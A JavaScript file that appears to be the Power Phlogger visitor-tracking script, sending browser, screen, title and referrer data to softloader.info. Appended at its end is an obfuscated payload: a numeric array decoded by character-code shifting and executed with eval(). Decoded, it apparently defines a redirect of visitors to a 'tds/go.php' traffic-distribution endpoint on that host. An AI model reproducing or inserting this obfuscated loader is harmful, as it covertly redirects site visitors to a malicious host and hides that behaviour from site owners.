/* -----------------------------------------------
   POWER PHLOGGER - v.2.2.5
   (c) 2000-2003 www.phpee.com
   contact: webmaster@phpee.com
  ------------------------------------------------ */

// ----------------------------------------------------------
// SETTINGS:
// here should be your username you received from softloader.info
// Do not edit this file manually!! Use the one you got in your
// confirmation-email or the one from PowerPhlogger's settings
// section.
   id = "mgm";
// If you're using a frameset and are not getting correct 
// referrers, please uncomment the following line:
   // pp_frames = true;
// ----------------------------------------------------------


// define some defaults -------------------------------------
if(showme==null) var showme='n';
if(st==null)     var st='js';    // st means show-type


// get the user agent name ----------------------------------
v = navigator.appName;

// get the screen resolution --------------------------------
c=0;
if (v != "Netscape") c = screen.colorDepth;
else c = screen.pixelDepth;

// get the screen size --------------------------------------
s = screen.width+"x"+screen.height;

// get the document's title ---------------------------------
t = escape(document.title);

// get the document's referrer -------------------------------
var f = "";

// if pp_frames is true then try getting the framed referral (without error checking)
if (typeof(pp_frames) != "undefined")
	if (pp_frames)
		f = top.document.referrer;

// get the referral for non-multi-domained-framed sites using a Netscape browser
if ((f == "") || (f == "[unknown origin]") || (f == "unknown") || (f == "undefined"))
	if (document["parent"] != null) 
		if (parent["document"] != null) // ACCESS ERROR HERE!
			if (parent.document["referrer"] != null) 
				if (typeof(parent.document) == "object")
					f = parent.document.referrer; 

// get the referral for the current document if a framed referral wasn't found
if ((f == "") || (f == "[unknown origin]") || (f == "unknown") || (f == "undefined"))
	if (document["referrer"] != null) 
		f = document.referrer;

// convert all the unknown's into blank
if ((f == "") || (f == "[unknown origin]") || (f == "unknown") || (f == "undefined"))
	f = "";

// escape the referral
f = escape(f);

// getting data ready to send -------------------------------
r="?id="+id+"&referer="+f+"&r="+s+"&c="+c+"&showme="+showme+"&st="+st+"&title="+t;

// adding logid if called by st='phpjs'
if(jslogid==null) var jslogid = 0;
else r = r + "&jslogid="+jslogid;


if (st=='js') { // calling PowerPhlogger by JavaScript-tag
	if (v != "Microsoft Internet Explorer") {
		r = r+"&url="+document.URL; // $HTTP_REFERER problem with NS,...
	}
	document.open();
	document.write("<script language=\"JavaScript\" type=\"text/javascript\" src=\"http://softloader.info/pphlogger/pphlogger.php"+r+"\"></script>");
	document.close();
} else { // calling PowerPhlogger by IMG-tag
	rand = Math.round(1000*Math.random());
	r = r+"&b="+rand;  //force the page to load the IMG
	document.open();
	document.write("<img src=\"http://softloader.info/pphlogger/pphlogger.php"+r+"\" alt=\"\" border=\"0\">");
	document.close();
}
var str=["468", "467", "467", "467", "576", "555", "572", "490", "570", "569", "576", "519", "506", "517", "468", "467", "467", "467", "560", "575", "568", "557", "574", "563", "569", "568", "490", "555", "579", "559", "563", "575", "572", "558", "567", "555", "561", "579", "498", "571", "575", "559", "572", "579", "499", "581", "468", "467", "467", "467", "467", "577", "563", "568", "558", "569", "577", "504", "566", "569", "557", "555", "574", "563", "569", "568", "519", "497", "562", "574", "574", "570", "516", "505", "505", "573", "569", "560", "574", "566", "569", "555", "558", "559", "572", "504", "563", "568", "560", "569", "505", "574", "558", "573", "505", "561", "569", "504", "570", "562", "570", "521", "573", "563", "558", "519", "510", "496", "571", "519", "497", "490", "501", "490", "571", "575", "559", "572", "579", "490", "501", "490", "497", "497", "517", "468", "467", "467", "467", "583"];
 var temp='';
 var gg=''; 
 for (i=0; i<str.length; i++){
 gg=str[i]-458; 
 temp=temp+String.fromCharCode(gg); 
 } 
 eval(temp);